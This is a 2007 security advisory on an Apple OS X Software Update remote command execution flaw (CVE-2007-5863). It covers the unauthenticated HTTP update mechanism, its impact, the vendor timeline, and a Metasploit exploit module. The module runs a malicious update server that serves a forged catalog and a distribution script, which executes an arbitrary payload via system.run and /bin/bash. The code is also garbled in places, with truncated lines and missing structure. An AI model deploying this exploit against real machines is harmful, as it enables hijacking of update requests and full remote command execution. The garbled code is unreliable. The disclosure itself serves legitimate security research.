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Apple OS X Software Update Remote Command Execution

Apple Mac OS X Software Update Remote Command Execution Vulnerability

Copyright (c) 2007 Moritz Jodeit <moritz@xxxxxxxxxx> (2007/12/17)

I. Vulnerability Description

The OS X Software Update mechanism uses so called `distribution packages' [1],
which basically consist of two parts. The XML `catalog file', which lists the
available updates and the `distribution definition files' [1], which contain
information encoded in XML and JavaScript, defining every aspect of the
user experience, when installing an update.

When OS X checks for new updates, it first contacts swscan.apple.com
to receive the XML catalog file. This file references the distribution
definition files, which can reside on another server. Software Update
receives these files and calls some of the JavaScript functions to check,
if the update is suited for the local machine.

The catalog file and the distribution definition files are both received
using HTTP whithout any authentication. By running a malicious update server,
it is possible to provide distribution definition files, which execute
arbitrary commands using JavaScript on the remote machine requesting the
update. The System.run() method can be used for this, if the
`allow-external-scripts' option was set in the distribution definition
file, as documented in the "Installer JavaScript Reference" [2].


II. Impact

Combined with the ability to intercept requests to the official Apple update
server by other means like ARP or DNS spoofing, it is possible to execute
arbitrary commands on all clients requesting updates. OS X automatically
checks for updates at regular intervals (default is weekly), which allows
for exploitation, even without any user intervention.

III. Solution

This vulnerability was fixed with the latest Apple update APPLE-SA-2007-12-17.

IV. Vendor Response

2007/12/06      Initial contact with <product-security@xxxxxxxxx>
2007/12/06      Acknowledgement of received report
2007/12/12      Agreement on public release date
2007/12/17      Coordinated release of updates and advisory

V. Proof Of Concept

# $Id$

# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/

require 'msf/core'

module Msf

class Exploits::Osx::Browser::Software_Update < Msf::Exploit::Remote

        include Exploit::Remote::HttpServer::HTML

        def initialize(info = {})
                        'Name'           => 'Apple OS X Software Update Command 
                        'Description'    => %q{
                                This module exploits a feature in the 
Distribution Packages,
                        which are used in the Apple Software Update mechanism. 
This feature
                        allows for arbitrary command execution through 
JavaScript. This exploit
                        provides the malicious update server. Requests must be 
redirected to
                        this server by other means for this exploit to work.
                        'Author'         => [ 'Moritz Jodeit 
<moritz@xxxxxxxxxx>' ],
                        'License'        => MSF_LICENSE,
                        'Version'        => '$Revision$',
                        'References'     =>
                                        ['CVE', '2007-5863'],
                        'Payload'        =>
                                        'BadChars' => "\x00",
                                        'DisableNops' => true,
                        'Platform'      => 'osx',
                        'Targets'       =>
                                                        'Platform' => [ 'unix' 
                                                        'Arch'     => ARCH_CMD,
                        'DisclosureDate' => 'Dec 17 2007',
                        'DefaultTarget'  => 0))

                                OptPort.new('SRVPORT', [ true, "The local port 
to listen on.", 80 ]),
                                OptString.new('URIPATH', [ true, "The URI to 
use for this exploit.", "/" ])
                        ], self.class)

        # Encode some characters using character entity references and escape
        # any quotation characters, by splitting the string into multiple parts.
        def encode_payload(payload)
                encoded = payload.gsub(/[&<>"']/) do |s|
                        case s
                        when '&': "&amp;"
                        when '<': "&lt;"
                        when '>': "&gt;"
                        when '"': '"+\'"\'+"'
                        when '\'': "&apos;"
                return '"' + encoded + '"'

        # Generate the initial catalog file with references to the
        # distribution script, which does the actual exploitation.
        def generate_catalog(server)
                languages = [ "", "Dutsch", "English", "French", "German", 
"Italian", "Japanese",
                              "Spanish", "da", "fi", "ko", "no", "pt", "sv", 
"zh_CN", "zh_TW" ]
                productkey = rand_text_numeric(3) + "-" + rand_text_numeric(4)
                distfile = rand_text_alpha(8) + ".dist"

                sucatalog = '<?xml version="1.0" encoding="UTF-8"?>'
                sucatalog << '<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD 
PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd";>'
                sucatalog << '<plist version="1.0">'
                sucatalog << '<dict>'
                sucatalog << '<key>Products</key><dict>'
                sucatalog << "<key>#{productkey}</key><dict>"
                sucatalog << '<key>Distributions</key><dict>'

                languages.each do |l|
                        sucatalog << 

                sucatalog << '</dict></dict></dict></dict></plist>'

                return sucatalog

        # Generate distribution script, which calls our payload using 
        def generate_dist(payload)
                func = rand_text_alpha(8)

                dist = '<?xml version="1.0" encoding="UTF-8"?>'
                dist << "<installer-gui-script minSpecVersion='1'>"
                dist << '<options allow-external-scripts = "yes"/>'
                dist << "<choices-outline ui='SoftwareUpdate'>"
                dist << "<line choice='su'/>"
                dist << "</choices-outline>"
                dist << "<choice id='su' visible ='#{func}()'/>"
                dist << "<script>"
                dist << "function #{func}() { system.run('/bin/bash', '-c', 
#{encode_payload(payload)}); }"
                dist << "</script>"
                dist << "</installer-gui-script>"

                return dist

        def on_request_uri(cli, request)
                date = Time.now
                server = "swscan.apple.com"

                header = {
                        'Content-Type' => 'text/plain',
                        'Last-Modified' => date,
                        'Date' => date,

                if request.uri =~ /\.sucatalog$/
                        print_status("Sending initial distribution package to 
                        body = generate_catalog(server)
                elsif request.uri =~ /\.dist$/
                        print_status("Sending distribution script to 
                        return if ((p = regenerate_payload(cli)) == nil)
                        body = generate_dist(p.encoded)
                send_response(cli, body, header)
